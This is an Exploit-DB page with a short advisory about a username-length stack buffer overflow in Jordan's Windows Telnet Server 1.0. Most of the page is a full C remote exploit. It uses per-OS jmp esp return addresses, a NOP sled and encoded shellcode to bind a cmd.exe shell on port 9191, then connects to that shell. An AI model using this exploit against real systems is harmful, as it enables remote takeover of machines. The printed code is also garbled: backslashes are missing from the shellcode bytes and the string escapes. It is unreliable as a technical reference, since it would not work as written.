https://www.exploit-db.com/exploits/23492

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/9316/info
 
Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficient reserved buffer in stack-based memory, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt a saved instruction pointer for the vulnerable function. 

/*
 *   Jordan's Windows Telnet server v.1.0 remote exploit
 *  binds cmd.exe shell on port 9191
 *
 * Home page: http://www.jordan.com/WindowsTelnetServer
 * Advisory: http://security.nnov.ru/search/document.asp?docid=5583
 *
 * Tested on winxp only, but must work on other win32 systems.
 *
 * -d4rkgr3y [[email protected]], m00.void.ru
 *
*/

#include <string.h>
#include <unistd.h>
#include <netdb.h>

struct
{
	char *platform;
	long ret;
}

targets[]=
{
	{"Windows XP sp0", 0x77F5801C}, // ntdll.dll : jmp esp
	{"Windows XP sp1", 0x77fb59cc},
	{"Windows 2000 SP1" , 0x77e3cb4c } ,
	{"Windows 2000 SP2" , 0x77e2492b } ,
	{"Windows 2000 SP3" , 0x77e2afc5 } ,
	{"Windows 2000 SP4" , 0x77e14c29 } ,
	{"Windows NT sp6", 0x77f0eac3},
	{"Windows 98 SE", 0x7fdabfa9},
	{"Denial-of-Service attack", 0xdefaced},
};

char payload[] =
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90";

char w32pbshellcode[] =
	"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
	"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
	"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
	"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
	"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
	"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
	"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
	"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
	"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
	"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
	"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
	"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
	"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
	"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
	"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
	"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
	"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
	"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
	"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
	"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
	"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
	"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
	"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
	"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
	"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
	"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
	"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
	"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
	"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
	"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
	"xD3x4Ax8Cx88";

void usage();

struct hostent *hp;

int main(int argc, char *argv[])
	{
	unsigned short port=23;
	unsigned int sock,addr,hand;
	char buf[1032], shit[666];

	printf("n    Jordan's Windows Telnet server v.1.0 remote exploitn");
	printf("ttby m00 Security // m00.void.runn");

	if(argc<3 || argc>4) usage(argv[0]);
	if((atoi(argv[2]))>5) usage(argv[0]);
	if(argv[3]) port = atoi(argv[3]);

	memset(buf,'x41',1032);
	memcpy(&buf[512], (unsigned char *) &targets[atoi(argv[2])].ret, 4);
	memcpy(&buf[516], payload, sizeof(payload));
	memcpy(&buf[548], w32pbshellcode, sizeof(w32pbshellcode));
	memset(buf+strlen(w32pbshellcode)+548,'x0d',1);
	memset(buf+strlen(w32pbshellcode)+548+1,'x0a',1);

	printf("~ Resolving hostname => ");
	if((hp=gethostbyname(argv[1]))==NULL) {
		printf("failedn");
		exit(1);
	}
	printf("donen");

	printf("~ Conneting => ");
	if((sock=connect_to_host(port))==-1) {
		printf("failedn");
		exit(1);
	}
	printf("donen");

	printf("~ Sending exploit buffer => ");
	sleep(2);
	recv(sock,shit,666,0);
	send(sock,buf,1032,0);
	printf("donen");
	printf("~ Connecting to bindshell => ");
	usleep(1000);
	if((hand=connect_to_host(9191))==-1)
		printf("failednn");
	else {
		printf("donen~ Shell spawned on port 9191 ^ have a nice daynn");
		get_shell(hand);
	}

	close(sock);
	exit(0);
}

void usage(char *progname)
{
	int i;
	printf("Usage: %s <host> <os type> [port]nnWhere 'os type' is:n",progname);
	for(i=0;targets[i].platform;i++) {
		printf("  %i %sn", i, targets[i].platform);
	}
	printf("n");
	exit(0);
}

int connect_to_host(int port)
{
	int sockt;
	struct sockaddr_in saddr;

	if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hp->h_addr_list[0]);
	saddr.sin_port=htons(port);
	if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sockt);
		return -1;
	} else
	return sockt;
}

int get_shell(int bsh)
{
	fd_set rfds;
	int retVal,r;
	char buf[0x31337];
	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(bsh, &rfds);
		retVal=select(bsh+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(bsh, &rfds)) {

				buf[(r=recv(bsh, buf, 8095,0))]='';
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				buf[(r=read(0, buf, 8095))]='';
				send(bsh, buf, strlen(buf), 0);
			}
		}
	} while(retVal && r);

	close(bsh);
	return 1;
}